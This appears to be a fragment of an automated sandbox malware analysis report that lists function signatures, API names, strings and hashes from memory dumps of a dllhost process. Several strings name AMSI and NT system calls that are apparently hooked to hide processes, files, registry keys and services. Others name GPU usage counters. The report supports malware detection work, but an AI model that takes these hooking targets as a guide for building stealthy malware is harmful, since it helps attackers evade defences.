                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 2d32d4a68c97803afc34837856c5f346cafefa26cc6b117a135a7221827392fd
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 4451A8A0510B8AA5EB08DFA8EC4DBD8E721BB44346F802513941957577DFF9C3BAC3A0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 195532ac76688832ce96b74fb770bb0353a0ae24c1b009caba6c0566481437de
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: B0518E32210B849AE764CF62E84835AF7A1F788FD9F444125DE49077A9EF7CC269C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 6773643cd4135b393034aa215551e09541e7fd1903df0961bc9a8014ff95c517
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 2C515D32210B849AE724CF62E44C76AF7A1F788F99F444125DE4947729EF7CC269C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 2a1540577c5fd60c6a69e652832e491e7bae1597817b3127b48819386d32595d
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 7651C021711B4851FB659F56A8083A9E390BB4CBB0F880725DE3D073E7EFB8D666D640
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 346a5ce061f7a5577ce12f1099ab2503cf1a127bc3d5e0575ba36058a4326360
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 2451C02170170451EB159F56A808BA9F290BB48BB1F580B259E3D473F2EFB8D666C760
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 41399fe78d7e0aa3b741b6368685e9bdc48fdb4c38ac004f0f3ee9675ba0c375
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: FE31CE32A10B4596F721CF12A80875DE3A0F79CF95F440625EE4943A7AEFB8E766C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 5a9ae2a43a158a2b47f1b8e7fa2cc2d0bd4070aedc18c287428adf2e9539f7b3
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 7431A732600B4497E721DF12A80C75EE3A1F78CBD5F444625DE4943A36EFB8D666C750
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 6702e45fac6de3601c22f6fc68b82caaaba8144ad13dec1b1b045cddd593ae06
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 10318F31620B458AF750DF22A848759F3E0B79CF96F444125DE8A43776EFB8E766C600
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 89e0bb38bb48001ef2e55b8434371a286b1f9315067b2c1976db8720ec864604
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 99318231611B498AE710DF26B84CB69E3A0F788F96F444125DE8A43B36EFB8C765C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 4f805535f00e6aa4b24833a22b2318b13165ad00b5f80122bdc222f9bfffeacc
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 54D1B272A44B408AFB60DF65D4883ADF7A0F745798F102115EE8997BA7DFB4E2A1C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 92593b6122ca06b1e91c303aeaa7d5c85511562bf8a2d035777a9c28afcd4120
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: FAD18E72624B808AFB20DF65D44839DF7A0F74AB98F100119EE8957BA7DFB4C6A5D700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 6df6260a6d2020579997beabf89d0af12c097bd0ce4be470adf387ff7fe505b5
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 73D1B172604B808AEF61DF65D448B9DF7A0F745B89F100215EE8957BABDFB4C6A0C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                            • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                            • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                            • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 0cbe54d75748d27415916f089b66c89371f0ebafd91c48e06236c34af6ff9a27
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 65416373214B84D6E7A4CF21E44879EF7A1F388B98F448115DB8907768EF78D695CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 698dd766ebe74dda75e47ca79a564a8c6d126b2508e645fa3356eb86d4cfa06a
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 37419033214B80DAE764CF21E44879EF7A1F388B99F448129DB8907B68DF78C599CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: eeceaa4c9c0750c3ec001b4930876f86dd6fb1f8c93308f392b0d99a6d5582be
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 67117932628B4082F7508F21F41835AF760F388BE4F940315EA9902AE9DFBDC269CB44
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 25a8fa04c9e510b5beb4a0bd7edefcb8d0bea2f1da315196ea9bdc755dc31701
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 32115B32614B4083E7108F21F41976AF761F789BD5F940315EA9942BA9CFBCC269CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 6420d284b2dd80b0e63b7e9612f9f1f15acd3ace0d83d0636dbd862d679f8764
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: ED812521A8034186FB50AB65984D39DE2E1AB86780F446035AD49477B3DFFAEBF6C701
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: ae3e29faa0583e8bdd0b0850a0d15489fd8ef397a0e95ee2ca2fc8b3b6cf7195
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: E881F7606247C146FB50AB65984D369E394AB9E784F484035EA48473F7EFF8CB72E300
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9B31
                                            • GetLastError.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: e0ff2c360697ce4364d8f03b9f9f0727be581fefe44467832d29afe931ce7191
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: C031C121322B4081FF529B02A8087A5E3D5BB5CBE0F590625ED1D8B7A6EFB8C664D304
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9B31
                                            • GetLastError.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
